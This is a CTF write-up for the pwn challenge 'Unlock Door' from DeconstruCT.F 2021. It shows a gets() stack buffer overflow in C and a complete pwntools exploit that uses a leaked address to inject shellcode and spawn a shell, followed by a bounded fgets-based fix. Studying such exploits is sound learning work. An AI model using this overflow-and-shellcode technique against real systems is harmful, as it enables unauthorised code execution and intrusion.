---
layout: post
title: "DeconstruCT.F 2021 | PWN | Unlock Door"
date: 2021-10-03 13:37:00 +0700
tags: [ctf, writeup]
---

<figure>
<img src="https://cdn.discordapp.com/attachments/874145963407720513/894206917239513118/Group.png">
</figure>

#### PWN | UNLOCK_DOOR (379 points | 22 solves)

Challenge Description:

```
Hello Agent, I apologize for the unusual time of this mission but this mission takes high priority
I have accidentally locked myself in my office and the password that I have set for my office door does not work
I assume that one of the janitors has accidentally reset the password
Your mission is to unlock my office door
Unfortunately the program that unlocks the door is not exposed to the network but there is another record keeping program that is exposed to the network and runs on the same machine.
The connection info for the record keeper and the source code is included below.

nc overly.uniquename.xyz 2082
```

The source code is given.<br>
record_keeper.c:

```c
#include <stdio.h>
#include <string.h>

void get_record() {
    printf("Enter record:");
    char record[128] = "";
    gets(record);   // no length limit: input longer than 128 bytes overflows the stack buffer
}

int main(int argc, char **argv) {
    get_record();
}
```

The provided source has a buffer overflow vulnerability caused by the `gets()` call, which reads unbounded input into the 128-byte `record` buffer. But when I connect to the given service, its output differs from what the provided source would print:

<img src="https://cdn.discordapp.com/attachments/874554128553095198/894596106917384192/unknown.png">

**Solution:**

I assumed that we should take advantage of the leaked address, and immediately tried to generate shellcode and jump to that address. Our input buffer holds only 128 bytes, so an offset of 128 bytes reaches the saved RBP and an offset of 136 bytes reaches the saved RIP.
Exploit:

```python
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
from pwn import *
from os import path
import sys

# ==========================[ Information
DIR = path.dirname(path.abspath(__file__))
EXECUTABLE = "/chall"
TARGET = DIR + EXECUTABLE
HOST, PORT = "overly.uniquename.xyz", 2082
REMOTE, LOCAL = False, False

# ==========================[ Tools
elf = ELF(TARGET)
elfROP = ROP(elf)

# ==========================[ Configuration
context.update(
    arch=["i386", "amd64", "aarch64"][1],
    endian="little",
    os="linux",
    log_level=['debug', 'info', 'warn'][2],
    terminal=['tmux', 'split-window', '-h'],
)

# ==========================[ Exploit
def exploit(io, libc=None):
    if LOCAL:
        # raw_input("Fire GDB!")
        if len(sys.argv) > 1 and sys.argv[1] == "d":
            chosen_gdb = [
                "source /home/mydata/tools/gdb/gdb-pwndbg/gdbinit.py",   # 0 - pwndbg
                "source /home/mydata/tools/gdb/gdb-peda/peda.py",        # 1 - peda
                "source /home/mydata/tools/gdb/gdb-gef/.gdbinit-gef.py"  # 2 - gef
            ][0]
            cmd = chosen_gdb + """
            """
            gdb.attach(io, gdbscript=cmd)

    # the service prints a leaked address after "location:" (see screenshot above)
    io.recvuntil(b"location:")
    LEAKED_ADDRESS = int(io.recvline().strip().decode(), 16)
    print("LEAKED_ADDRESS :", hex(LEAKED_ADDRESS))

    # shellcode at the start of the buffer, NOP padding up to the saved RIP (offset 136),
    # then the leaked address so the function return lands on the shellcode
    p = b""
    p += asm(shellcraft.sh())
    p += b"\x90" * (136 - len(p))
    p += p64(LEAKED_ADDRESS)
    io.sendline(p)

    io.sendline(b"echo 'SEKTE GADENG'")
    io.sendline(b"cat unlock_door.sh")  # flag location
    io.interactive()

if __name__ == "__main__":
    io, libc = None, None
    if args.REMOTE:
        REMOTE = True
        io = remote(HOST, PORT)
        # libc = ELF("___")
    else:
        LOCAL = True
        io = process(
            [TARGET, ],
            env={
                # "LD_PRELOAD": DIR + "/___",
                # "LD_LIBRARY_PATH": DIR + "/___",
            },
        )
        # libc = ELF("___")
    exploit(io, libc)
```

<img src="https://cdn.discordapp.com/attachments/874554128553095198/894597189307875358/unknown.png"><br>

FLAG : **dsc{0pEN_5E5Ame}**
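For comparison, here is a bounded replacement for the `gets()` call in `record_keeper.c`; this is an added example, not part of the original writeup or the challenge code. `fgets()` caps the read at the buffer size, so the 136 bytes needed to reach the saved RIP can no longer be written, and an oversized line is drained and reported instead of silently spilling past the buffer. `read_record_from_text()` is a helper I added so the reader can be exercised on in-memory input.

```c
#include <stdio.h>
#include <string.h>

#define RECORD_SIZE 128   /* same buffer size as record_keeper.c */

/* Bounded replacement for gets() in get_record(). Reads one line from `in`
 * into `record` (capacity `size`), storing at most size-1 bytes plus the
 * terminator, so input can no longer reach the saved rbp (offset 128) or the
 * return address (offset 136). If the line does not fit, the excess is drained
 * from the stream so it is not read as the next record, and truncation is reported.
 * Returns 0 = line stored, 1 = stored but truncated, -1 = EOF / no data. */
int read_record(FILE *in, char *record, size_t size) {
    if (size == 0 || fgets(record, (int)size, in) == NULL) {
        if (size) record[0] = '\0';
        return -1;
    }
    size_t len = strlen(record);
    if (len > 0 && record[len - 1] == '\n') {
        record[len - 1] = '\0';
        return 0;                      /* whole line fit, newline stripped */
    }
    int c = fgetc(in);
    if (c == EOF || c == '\n')         /* line fit exactly, or ended at EOF */
        return 0;
    while (c != '\n' && c != EOF)      /* too long: drain the rest of the line */
        c = fgetc(in);
    return 1;
}

/* Helper (added here): run read_record() over a string via a temporary file. */
int read_record_from_text(const char *text, char *record, size_t size) {
    FILE *f = tmpfile();
    if (f == NULL) return -1;
    fputs(text, f);
    rewind(f);
    int rc = read_record(f, record, size);
    fclose(f);
    return rc;
}

int main(void) {
    char record[RECORD_SIZE];
    printf("Enter record:");
    fflush(stdout);
    int rc = read_record(stdin, record, sizeof record);
    if (rc < 0) return 1;
    printf("stored %zu bytes%s\n", strlen(record), rc == 1 ? " (input truncated)" : "");
    return 0;
}
```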